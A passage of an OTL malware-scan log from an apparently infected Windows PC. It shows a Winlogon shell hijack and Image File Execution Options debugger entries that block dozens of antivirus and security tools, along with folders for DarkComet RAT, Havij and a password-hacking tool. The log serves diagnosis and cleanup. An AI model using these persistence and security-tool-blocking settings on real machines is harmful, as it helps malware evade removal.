O20 - HKCU Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKCU Winlogon: Shell - ("C:\Windows\SysWOW64\Windows Server\wserver.exe") - C:\Windows\SysWOW64\Windows Server\wserver.exe ()
O20:64bit: - Winlogon\Notify\avldr: DllName - (avldr64.dll) -  File not found
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O24 - Desktop BackupWallPaper: C:\Windows\Web\Wallpaper\awisp.jpg
O27:64bit: - HKLM IFEO\ASD2.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\ASD2Srv.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\AvastSvc.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\AvastUI.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avcenter.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avconfig.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avgnt.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avguard.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avp.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avscan.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\bdagent.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\blindman.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\ccuac.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\ComboFix.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\egui.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\hijackthis.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\instup.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\keyscrambler.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbam.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbamgui.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbampt.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbamscheduler.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbamservice.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\MpCmdRun.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\MSASCui.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\MsMpEng.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\msseces.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\rstrui.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\SDFiles.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\SDMain.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\SDWinSec.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\spybotsd.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\SUPERAntiSpyware.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\wireshark.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\zlclient.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\ASD2.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\ASD2Srv.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\AvastSvc.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\AvastUI.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avcenter.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avconfig.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avgnt.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avguard.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avp.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avscan.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\bdagent.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\blindman.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\ccuac.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\ComboFix.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\egui.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\hijackthis.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\instup.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\keyscrambler.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbam.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbamgui.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbampt.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbamscheduler.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbamservice.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\MpCmdRun.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\MSASCui.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\MsMpEng.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\msseces.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\rstrui.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\SDFiles.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\SDMain.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\SDWinSec.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\spybotsd.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\SUPERAntiSpyware.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\wireshark.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\zlclient.exe: Debugger - nqij.exe File not found
O28:64bit: - HKLM ShellExecuteHooks: {AEB6717E-7E19-11d0-97EE-00C04FD91972} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2014/04/27 16:07:22 | 000,000,000 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O34 - HKLM BootExecute: (MACHINE BootExecut)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
 
Drivers32:64bit: msacm.bdmpeg - bdmpega64.acm ()
Drivers32:[b]64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32:[b]64bit: VIDC.CSCD - camcodec.dll (CamStudio Group)
Drivers32:[b]64bit: vidc.mjpg - bdmjpeg64.dll ()
Drivers32:[b]64bit: vidc.mpeg - bdmpegv64.dll ()
Drivers32:[b]64bit: vidc.tscc - C:\Windows\SysWOW64\tsccvid64.dll (TechSmith Corporation)
Drivers32:[b]64bit: VIDC.XFR1 - xfcodec64.dll ()
Drivers32:[b]64bit: vidc.XVID - xvidvfw.dll ()
Drivers32: msacm.bdmpeg - C:\Windows\SysWow64\bdmpega.acm ()
Drivers32: msacm.l3acm - C:\Windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.l3codecp - C:\Windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.)
Drivers32: vidc.DIVX - C:\Windows\SysWow64\DivX.dll (DivX, Inc.)
Drivers32: vidc.iv50 - C:\Windows\SysWow64\ir50_32.dll (Intel Corporation)
Drivers32: vidc.mjpg - C:\Windows\SysWow64\bdmjpeg.dll ()
Drivers32: vidc.mpeg - C:\Windows\SysWow64\bdmpegv.dll ()
Drivers32: vidc.tscc - C:\Windows\SysWOW64\tsccvid.dll (TechSmith Corporation)
Drivers32: VIDC.XFR1 - C:\Windows\SysWow64\xfcodec.dll ()
Drivers32: vidc.XVID - C:\Windows\SysWow64\xvidvfw.dll ()
Drivers32: vidc.yv12 - C:\Windows\SysWow64\DivX.dll (DivX, Inc.)
 
CREATERESTOREPOINT
Unable to start System Restore Service. Error code 1084
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/05/30 11:08:43 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Owner\Desktop\OTL.exe
[2014/05/30 08:25:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
[2014/05/30 08:25:28 | 000,000,000 | ---D | C] -- C:\Program Files\HitmanPro
[2014/05/30 08:24:31 | 000,000,000 | ---D | C] -- C:\ProgramData\HitmanPro
[2014/05/30 08:21:29 | 000,000,000 | ---D | C] -- C:\VIPRERESCUE
[2014/05/28 08:43:24 | 000,000,000 | -HSD | C] -- C:\Users\Owner\Documents\WindSys
[2014/05/26 13:17:17 | 000,000,000 | ---D | C] -- C:\SMCLPAV
[2014/05/26 13:16:17 | 000,446,464 | ---- | C] (eHelp Corporation.) -- C:\Windows\SysWow64\HHActiveX.dll
[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Panda Security
[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Panda Security
[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Panda Security
[2014/05/26 13:12:20 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center
[2014/05/26 13:12:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\360
[2014/05/26 11:07:24 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\SearchProtect
[2014/05/26 10:42:08 | 000,000,000 | ---D | C] -- C:\Users\Owner\Desktop\rkill
[2014/05/26 09:47:02 | 000,000,000 | ---D | C] -- C:\NVIDIA
[2014/05/26 09:38:08 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Ubisoft
[2014/05/26 08:38:13 | 000,000,000 | ---D | C] -- C:\5b752946a35719a003b287da
[2014/05/26 05:54:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Comodo
[2014/05/26 04:39:52 | 000,000,000 | ---D | C] -- C:\ProgramData\YoutubeAdblocker
[2014/05/26 03:20:57 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\SpeedyPC Software
[2014/05/26 03:20:57 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\DriverCure
[2014/05/26 03:20:49 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedyPC Software
[2014/05/26 03:20:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\SpeedyPC Software
[2014/05/26 03:20:39 | 000,000,000 | ---D | C] -- C:\ProgramData\SpeedyPC Software
[2014/05/26 03:20:39 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SpeedyPC Software
[2014/05/26 01:39:19 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\KSafe
[2014/05/26 01:39:19 | 000,000,000 | ---D | C] -- C:\ProgramData\KSafe
[2014/05/26 01:39:14 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DllTool
[2014/05/26 01:39:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\DllTool
[2014/05/26 01:10:43 | 000,000,000 | ---D | C] -- C:\malware
[2014/05/26 01:09:35 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\Malware
[2014/05/26 00:25:28 | 000,000,000 | -HSD | C] -- C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
[2014/05/25 23:48:17 | 000,000,000 | ---D | C] -- C:\_OTM
[2014/05/25 22:05:48 | 000,000,000 | ---D | C] -- C:\SUPERDelete
[2014/05/25 21:25:01 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\SUPERAntiSpyware.com
[2014/05/25 21:25:01 | 000,000,000 | ---D | C] -- C:\ProgramData\SUPERAntiSpyware.com
[2014/05/25 20:30:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi
[2014/05/25 20:30:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\LogMeIn Hamachi
[2014/05/25 20:28:05 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\dclogs
[2014/05/25 20:21:47 | 000,000,000 | -HSD | C] -- C:\ProgramData\Windows Server
[2014/05/25 19:55:13 | 000,000,000 | -HSD | C] -- C:\Windows\SysWow64\Windows Server
[2014/05/25 19:25:54 | 000,000,000 | ---D | C] -- C:\ProgramData\SNT
[2014/05/25 19:25:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SNT
[2014/05/25 19:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SearchProtect
[2014/05/25 19:24:24 | 000,000,000 | ---D | C] -- C:\ProgramData\TopApp software
[2014/05/25 19:22:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\YoutubeAdblocker
[2014/05/25 19:22:33 | 000,000,000 | ---D | C] -- C:\ProgramData\sAve on
[2014/05/25 19:22:33 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Packages
[2014/05/25 19:22:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\sAve on
[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Torch
[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Chromatic Browser
[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\ProgramData\5ad6ba851b005ffc
[2014/05/25 19:22:29 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Comodo
[2014/05/25 19:20:32 | 000,000,000 | ---D | C] -- C:\ProgramData\InstallMate
[2014/05/25 18:21:17 | 000,188,928 | -H-- | C] (ghaMJsw) -- C:\Users\Owner\AppData\Roaming\File Name.exe
[2014/05/25 17:13:15 | 000,000,000 | ---D | C] -- C:\Users\Owner\AlwaysOnPC
[2014/05/25 16:29:11 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Neptune
[2014/05/25 15:41:25 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\AutomaticSolution Software
[2014/05/25 15:41:23 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\EasyAutoClicker
[2014/05/25 15:41:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Easy Auto Clicker
[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\AminApps
[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\A&N File Recovery
[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\A&N File Recovery
[2014/05/21 22:10:14 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Twitter Password Hacking Tool v2.5.7
[2014/05/21 17:46:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2014/05/18 18:44:38 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DarkComet RAT Legacy
[2014/05/18 18:44:34 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\PhrozenSoft
[2014/05/14 03:34:04 | 017,938,608 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerInstaller.exe
[2014/05/14 03:18:43 | 000,084,992 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/05/14 03:18:43 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/05/14 03:18:22 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\DESIGNER
[2014/05/13 17:00:41 | 000,477,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/05/13 17:00:41 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/05/13 16:59:00 | 001,460,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lsasrv.dll
[2014/05/13 16:58:59 | 003,969,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2014/05/13 16:58:59 | 003,914,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2014/05/13 16:58:58 | 005,550,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2014/05/13 16:58:58 | 000,722,944 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\objsel.dll
[2014/05/13 16:58:58 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe
[2014/05/13 16:58:57 | 000,538,112 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\objsel.dll
[2014/05/13 16:58:57 | 000,424,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\KernelBase.dll
[2014/05/13 16:58:56 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspicli.dll
[2014/05/13 16:58:56 | 000,057,344 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cngprovider.dll
[2014/05/13 16:58:56 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\adprovider.dll
[2014/05/13 16:58:56 | 000,053,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\capiprovider.dll
[2014/05/13 16:58:56 | 000,052,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dpapiprovider.dll
[2014/05/13 16:58:56 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cngprovider.dll
[2014/05/13 16:58:56 | 000,049,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\adprovider.dll
[2014/05/13 16:58:56 | 000,048,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\capiprovider.dll
[2014/05/13 16:58:56 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dpapiprovider.dll
[2014/05/13 16:58:56 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dimsroam.dll
[2014/05/13 16:58:56 | 000,039,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wincredprovider.dll
[2014/05/13 16:58:56 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dimsroam.dll
[2014/05/13 16:58:56 | 000,035,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wincredprovider.dll
[2014/05/13 16:58:56 | 000,029,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspisrv.dll
[2014/05/13 16:58:56 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secur32.dll
[2014/05/07 03:01:27 | 000,000,000 | --SD | C] -- C:\Windows\SysNative\CompatTel
[2014/05/04 11:45:23 | 000,260,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RICHTX32.ocx
[2014/05/04 11:45:23 | 000,209,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\tabctl32.ocx
[2014/05/04 11:45:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Havij
[2014/05/04 11:45:22 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Havij
[2014/05/04 00:12:36 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\Paint.NET User Files
[2014/05/03 14:36:58 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2014/05/01 20:52:46 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
[2014/05/01 20:52:38 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2014/05/01 20:20:54 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\MultiBit
[2014/05/01 20:20:31 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MultiBit-0.5.18
[2014/05/01 20:20:31 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MultiBit
[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/05/30 23:07:14 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Owner\Desktop\OTL.exe
[2014/05/30 11:11:13 | 000,723,544 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\msconfig.ini
[2014/05/30 10:51:16 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/05/30 10:47:49 | 000,045,581 | ---- | M] () -- C:\Users\Owner\Documents\mwb-error-2.png
[2014/05/30 10:46:12 | 000,040,689 | ---- | M] () -- C:\Users\Owner\Documents\mwb-error.png
[2014/05/30 10:40:01 | 000,019,344 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/05/30 10:40:00 | 000,019,344 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/05/30 10:31:45 | 000,032,512 | ---- | M] () -- C:\Windows\SysNative\drivers\hitmanpro37.sys
[2014/05/30 08:57:24 | 000,001,130 | ---- | M] () -- C:\Users\Owner\Desktop\ROBLOX Studio 2013.lnk
[2014/05/30 08:25:29 | 000,001,889 | ---- | M] () -- C:\Users\Public\Desktop\HitmanPro.lnk
[2014/05/28 10:25:52 | 000,002,235 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/05/26 13:12:20 | 000,001,049 | ---- | M] () -- C:\Users\Owner\Desktop\360 Total Security.lnk
[2014/05/26 10:41:58 | 000,000,468 | -H-- | M] () -- C:\Windows\tasks\SO.Booster-S-603818780.job
[2014/05/26 10:37:09 | 000,000,908 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000UA.job
[2014/05/26 10:34:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/05/26 10:27:00 | 000,000,388 | ---- | M] () -- C:\Windows\tasks\update-S-1-5-21-133263452-1906430011-745098151-1000.job
[2014/05/26 10:22:00 | 000,000,388 | ---- | M] () -- C:\Windows\tasks\update-sys.job
[2014/05/26 10:17:00 | 000,000,924 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1005UA.job
[2014/05/26 10:06:04 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/05/26 10:05:00 | 000,000,384 | ---- | M] () -- C:\Windows\tasks\WpsUpdateTask_Nick.job
[2014/05/26 09:38:21 | 000,281,872 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2014/05/26 09:38:14 | 000,281,872 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrB.ex0
[2014/05/26 09:38:13 | 000,076,888 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2014/05/26 09:15:01 | 000,000,928 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000UA.job
[2014/05/26 05:36:34 | 002,993,976 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/05/26 03:21:01 | 000,000,444 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Registration3.job
[2014/05/26 03:20:49 | 000,001,197 | ---- | M] () -- C:\Users\Owner\Desktop\SpeedyPC Pro.lnk
[2014/05/26 03:20:49 | 000,000,571 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Pro_sch_A41C6437-E4AE-11E3-9423-0026188D9465.job
[2014/05/26 03:20:49 | 000,000,464 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Update Version3_triggeronce.job
[2014/05/26 03:20:49 | 000,000,464 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Update Version3.job
[2014/05/26 01:39:14 | 000,001,077 | ---- | M] () -- C:\Users\Owner\Desktop\DllTool.lnk
[2014/05/26 00:31:51 | 000,000,510 | ---- | M] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task e1800e5a-718e-492b-81f8-0f6a2e27702e.job
[2014/05/26 00:31:51 | 000,000,510 | ---- | M] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task 21055d1e-66ba-4203-943b-3df24c22fd8c.job
[2014/05/26 00:07:25 | 000,000,890 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/05/25 22:17:00 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1005Core.job
[2014/05/25 21:15:00 | 000,000,906 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000Core.job
[2014/05/25 20:30:41 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\LogMeIn Hamachi.lnk
[2014/05/25 19:23:08 | 004,210,176 | ---- | M] () -- C:\Program Files (x86)\SO_x64.Booster
[2014/05/25 19:23:08 | 000,174,928 | ---- | M] () -- C:\Program Files (x86)\SOSvc.dll
[2014/05/25 19:23:07 | 004,296,192 | ---- | M] () -- C:\Program Files (x86)\SO.Booster
[2014/05/25 19:18:52 | 000,043,850 | -H-- | M] () -- C:\Users\Owner\AppData\Roaming\Ownerlog.dat
[2014/05/25 18:36:00 | 000,000,856 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000Core.job
[2014/05/25 18:21:16 | 000,188,928 | -H-- | M] (ghaMJsw) -- C:\Users\Owner\AppData\Roaming\File Name.exe
[2014/05/25 15:41:24 | 000,001,123 | ---- | M] () -- C:\Users\Public\Desktop\Easy Auto Clicker.lnk
[2014/05/24 18:03:43 | 000,119,512 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/05/22 16:28:13 | 000,426,834 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\Bypasss.exe
[2014/05/20 18:20:04 | 000,002,098 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/20 16:15:03 | 000,000,334 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForOwner.job
[2014/05/15 22:35:11 | 000,000,050 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\install.imp
[2014/05/14 08:03:47 | 000,000,632 | RHS- | M] () -- C:\Users\Owner\ntuser.pol
[2014/05/14 03:34:12 | 000,692,400 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/05/14 03:34:12 | 000,070,832 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014/05/14 03:34:04 | 017,938,608 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerInstaller.exe
[2014/05/12 07:26:10 | 000,063,704 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mwac.sys
[2014/05/12 07:26:00 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/05/12 07:25:56 | 000,025,816 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2014/05/10 19:36:06 | 000,002,046 | -H-- | M] () -- C:\Users\Owner\Documents\Default.rdp
[2014/05/09 01:14:03 | 000,477,184 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/05/09 01:11:23 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/05/05 22:00:47 | 000,084,992 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/05/05 21:10:52 | 000,069,632 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/05/03 14:37:00 | 000,001,143 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/05/01 20:52:38 | 000,002,295 | ---- | M] () -- C:\Users\Owner\Desktop\Chrome App Launcher.lnk
[2014/05/01 20:20:31 | 000,001,813 | ---- | M] () -- C:\Users\Owner\Desktop\MultiBit 0.5.18.lnk
